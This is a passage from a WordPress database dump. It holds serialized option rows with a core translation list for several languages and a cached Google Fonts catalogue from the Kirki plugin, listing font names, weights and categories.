رکھیں\";}}s:5:\"uz_UZ\";a:8:{s:8:\"language\";s:5:\"uz_UZ\";s:7:\"version\";s:8:\"5.8-beta\";s:7:\"updated\";s:19:\"2021-02-28 12:02:22\";s:12:\"english_name\";s:5:\"Uzbek\";s:11:\"native_name\";s:11:\"O‘zbekcha\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/translation/core/5.8-beta/uz_UZ.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"uz\";i:2;s:3:\"uzb\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:11:\"Davom etish\";}}s:2:\"vi\";a:8:{s:8:\"language\";s:2:\"vi\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-22 14:30:31\";s:12:\"english_name\";s:10:\"Vietnamese\";s:11:\"native_name\";s:14:\"Tiếng Việt\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/translation/core/6.9.4/vi.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"vi\";i:2;s:3:\"vie\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:12:\"Tiếp tục\";}}s:3:\"yor\";a:8:{s:8:\"language\";s:3:\"yor\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-03-17 19:42:05\";s:12:\"english_name\";s:6:\"Yoruba\";s:11:\"native_name\";s:8:\"Yorùbá\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/translation/core/6.9.4/yor.zip\";s:3:\"iso\";a:3:{i:1;s:2:\"yo\";i:2;s:3:\"yor\";i:3;s:3:\"yor\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:18:\"Tẹ̀síwájú si\";}}s:5:\"zh_TW\";a:8:{s:8:\"language\";s:5:\"zh_TW\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-02-11 16:22:59\";s:12:\"english_name\";s:16:\"Chinese (Taiwan)\";s:11:\"native_name\";s:12:\"繁體中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/zh_TW.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}s:5:\"zh_CN\";a:8:{s:8:\"language\";s:5:\"zh_CN\";s:7:\"version\";s:5:\"6.9.4\";s:7:\"updated\";s:19:\"2026-04-01 20:39:14\";s:12:\"english_name\";s:15:\"Chinese (China)\";s:11:\"native_name\";s:12:\"简体中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.9.4/zh_CN.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"继续\";}}s:5:\"zh_HK\";a:8:{s:8:\"language\";s:5:\"zh_HK\";s:7:\"version\";s:5:\"6.2.9\";s:7:\"updated\";s:19:\"2022-07-15 15:25:03\";s:12:\"english_name\";s:19:\"Chinese (Hong Kong)\";s:11:\"native_name\";s:12:\"香港中文\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/translation/core/6.2.9/zh_HK.zip\";s:3:\"iso\";a:2:{i:1;s:2:\"zh\";i:2;s:3:\"zho\";}s:7:\"strings\";a:1:{s:8:\"continue\";s:6:\"繼續\";}}}','off'),
(1172679,'_site_transient_timeout_kirki_googlefonts_cache','1775223207','off'),
(1172680,'_site_transient_kirki_googlefonts_cache','a:1358:{s:7:\"ABeeZee\";a:3:{s:5:\"label\";s:7:\"ABeeZee\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Abel\";a:3:{s:5:\"label\";s:4:\"Abel\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Abhaya Libre\";a:3:{s:5:\"label\";s:12:\"Abhaya Libre\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Abril Fatface\";a:3:{s:5:\"label\";s:13:\"Abril Fatface\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Aclonica\";a:3:{s:5:\"label\";s:8:\"Aclonica\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Acme\";a:3:{s:5:\"label\";s:4:\"Acme\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Actor\";a:3:{s:5:\"label\";s:5:\"Actor\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Adamina\";a:3:{s:5:\"label\";s:7:\"Adamina\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Advent Pro\";a:3:{s:5:\"label\";s:10:\"Advent Pro\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Aguafina Script\";a:3:{s:5:\"label\";s:15:\"Aguafina Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Akaya Kanadaka\";a:3:{s:5:\"label\";s:14:\"Akaya Kanadaka\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Akaya Telivigala\";a:3:{s:5:\"label\";s:16:\"Akaya Telivigala\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Akronim\";a:3:{s:5:\"label\";s:7:\"Akronim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Aladin\";a:3:{s:5:\"label\";s:6:\"Aladin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Alata\";a:3:{s:5:\"label\";s:5:\"Alata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Alatsi\";a:3:{s:5:\"label\";s:6:\"Alatsi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Aldrich\";a:3:{s:5:\"label\";s:7:\"Aldrich\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Alef\";a:3:{s:5:\"label\";s:4:\"Alef\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Alegreya\";a:3:{s:5:\"label\";s:8:\"Alegreya\";s:8:\"variants\";a:12:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Alegreya SC\";a:3:{s:5:\"label\";s:11:\"Alegreya SC\";s:8:\"variants\";a:10:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"800\";i:5;s:9:\"800italic\";i:6;s:3:\"900\";i:7;s:9:\"900italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Alegreya Sans\";a:3:{s:5:\"label\";s:13:\"Alegreya Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Alegreya Sans SC\";a:3:{s:5:\"label\";s:16:\"Alegreya Sans SC\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Aleo\";a:3:{s:5:\"label\";s:4:\"Aleo\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Alex Brush\";a:3:{s:5:\"label\";s:10:\"Alex Brush\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Alfa Slab One\";a:3:{s:5:\"label\";s:13:\"Alfa Slab One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Alice\";a:3:{s:5:\"label\";s:5:\"Alice\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Alike\";a:3:{s:5:\"label\";s:5:\"Alike\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Alike Angular\";a:3:{s:5:\"label\";s:13:\"Alike Angular\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Allan\";a:3:{s:5:\"label\";s:5:\"Allan\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Allerta\";a:3:{s:5:\"label\";s:7:\"Allerta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Allerta Stencil\";a:3:{s:5:\"label\";s:15:\"Allerta Stencil\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Allison\";a:3:{s:5:\"label\";s:7:\"Allison\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Allura\";a:3:{s:5:\"label\";s:6:\"Allura\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Almarai\";a:3:{s:5:\"label\";s:7:\"Almarai\";s:8:\"variants\";a:4:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:3:\"800\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Almendra\";a:3:{s:5:\"label\";s:8:\"Almendra\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Almendra Display\";a:3:{s:5:\"label\";s:16:\"Almendra Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Almendra SC\";a:3:{s:5:\"label\";s:11:\"Almendra SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Alumni Sans\";a:3:{s:5:\"label\";s:11:\"Alumni Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Amarante\";a:3:{s:5:\"label\";s:8:\"Amarante\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Amaranth\";a:3:{s:5:\"label\";s:8:\"Amaranth\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Amatic SC\";a:3:{s:5:\"label\";s:9:\"Amatic SC\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Amethysta\";a:3:{s:5:\"label\";s:9:\"Amethysta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Amiko\";a:3:{s:5:\"label\";s:5:\"Amiko\";s:8:\"variants\";a:3:{i:0;s:3:\"600\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Amiri\";a:3:{s:5:\"label\";s:5:\"Amiri\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Amita\";a:3:{s:5:\"label\";s:5:\"Amita\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Anaheim\";a:3:{s:5:\"label\";s:7:\"Anaheim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Andada Pro\";a:3:{s:5:\"label\";s:10:\"Andada Pro\";s:8:\"variants\";a:10:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Andika\";a:3:{s:5:\"label\";s:6:\"Andika\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Andika New Basic\";a:3:{s:5:\"label\";s:16:\"Andika New Basic\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Angkor\";a:3:{s:5:\"label\";s:6:\"Angkor\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:24:\"Annie Use Your Telescope\";a:3:{s:5:\"label\";s:24:\"Annie Use Your Telescope\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Anonymous Pro\";a:3:{s:5:\"label\";s:13:\"Anonymous Pro\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:5:\"Antic\";a:3:{s:5:\"label\";s:5:\"Antic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Antic Didone\";a:3:{s:5:\"label\";s:12:\"Antic Didone\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Antic Slab\";a:3:{s:5:\"label\";s:10:\"Antic Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Anton\";a:3:{s:5:\"label\";s:5:\"Anton\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Antonio\";a:3:{s:5:\"label\";s:7:\"Antonio\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Arapey\";a:3:{s:5:\"label\";s:6:\"Arapey\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Arbutus\";a:3:{s:5:\"label\";s:7:\"Arbutus\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Arbutus Slab\";a:3:{s:5:\"label\";s:12:\"Arbutus Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:19:\"Architects Daughter\";a:3:{s:5:\"label\";s:19:\"Architects Daughter\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Archivo\";a:3:{s:5:\"label\";s:7:\"Archivo\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Archivo Black\";a:3:{s:5:\"label\";s:13:\"Archivo Black\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Archivo Narrow\";a:3:{s:5:\"label\";s:14:\"Archivo Narrow\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Are You Serious\";a:3:{s:5:\"label\";s:15:\"Are You Serious\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Aref Ruqaa\";a:3:{s:5:\"label\";s:10:\"Aref Ruqaa\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Arima Madurai\";a:3:{s:5:\"label\";s:13:\"Arima Madurai\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Arimo\";a:3:{s:5:\"label\";s:5:\"Arimo\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Arizonia\";a:3:{s:5:\"label\";s:8:\"Arizonia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Armata\";a:3:{s:5:\"label\";s:6:\"Armata\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Arsenal\";a:3:{s:5:\"label\";s:7:\"Arsenal\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Artifika\";a:3:{s:5:\"label\";s:8:\"Artifika\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Arvo\";a:3:{s:5:\"label\";s:4:\"Arvo\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Arya\";a:3:{s:5:\"label\";s:4:\"Arya\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Asap\";a:3:{s:5:\"label\";s:4:\"Asap\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Asap Condensed\";a:3:{s:5:\"label\";s:14:\"Asap Condensed\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Asar\";a:3:{s:5:\"label\";s:4:\"Asar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Asset\";a:3:{s:5:\"label\";s:5:\"Asset\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Assistant\";a:3:{s:5:\"label\";s:9:\"Assistant\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Astloch\";a:3:{s:5:\"label\";s:7:\"Astloch\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Asul\";a:3:{s:5:\"label\";s:4:\"Asul\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Athiti\";a:3:{s:5:\"label\";s:6:\"Athiti\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Atkinson Hyperlegible\";a:3:{s:5:\"label\";s:21:\"Atkinson Hyperlegible\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Atma\";a:3:{s:5:\"label\";s:4:\"Atma\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Atomic Age\";a:3:{s:5:\"label\";s:10:\"Atomic Age\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Aubrey\";a:3:{s:5:\"label\";s:6:\"Aubrey\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Audiowide\";a:3:{s:5:\"label\";s:9:\"Audiowide\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Autour One\";a:3:{s:5:\"label\";s:10:\"Autour One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Average\";a:3:{s:5:\"label\";s:7:\"Average\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Average Sans\";a:3:{s:5:\"label\";s:12:\"Average Sans\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Averia Gruesa Libre\";a:3:{s:5:\"label\";s:19:\"Averia Gruesa Libre\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Averia Libre\";a:3:{s:5:\"label\";s:12:\"Averia Libre\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:17:\"Averia Sans Libre\";a:3:{s:5:\"label\";s:17:\"Averia Sans Libre\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:18:\"Averia Serif Libre\";a:3:{s:5:\"label\";s:18:\"Averia Serif Libre\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Azeret Mono\";a:3:{s:5:\"label\";s:11:\"Azeret Mono\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:4:\"B612\";a:3:{s:5:\"label\";s:4:\"B612\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"B612 Mono\";a:3:{s:5:\"label\";s:9:\"B612 Mono\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:10:\"Bad Script\";a:3:{s:5:\"label\";s:10:\"Bad Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Bahiana\";a:3:{s:5:\"label\";s:7:\"Bahiana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Bahianita\";a:3:{s:5:\"label\";s:9:\"Bahianita\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Bai Jamjuree\";a:3:{s:5:\"label\";s:12:\"Bai Jamjuree\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Bakbak One\";a:3:{s:5:\"label\";s:10:\"Bakbak One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Ballet\";a:3:{s:5:\"label\";s:6:\"Ballet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Baloo 2\";a:3:{s:5:\"label\";s:7:\"Baloo 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Baloo Bhai 2\";a:3:{s:5:\"label\";s:12:\"Baloo Bhai 2\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Baloo Bhaijaan 2\";a:3:{s:5:\"label\";s:16:\"Baloo Bhaijaan 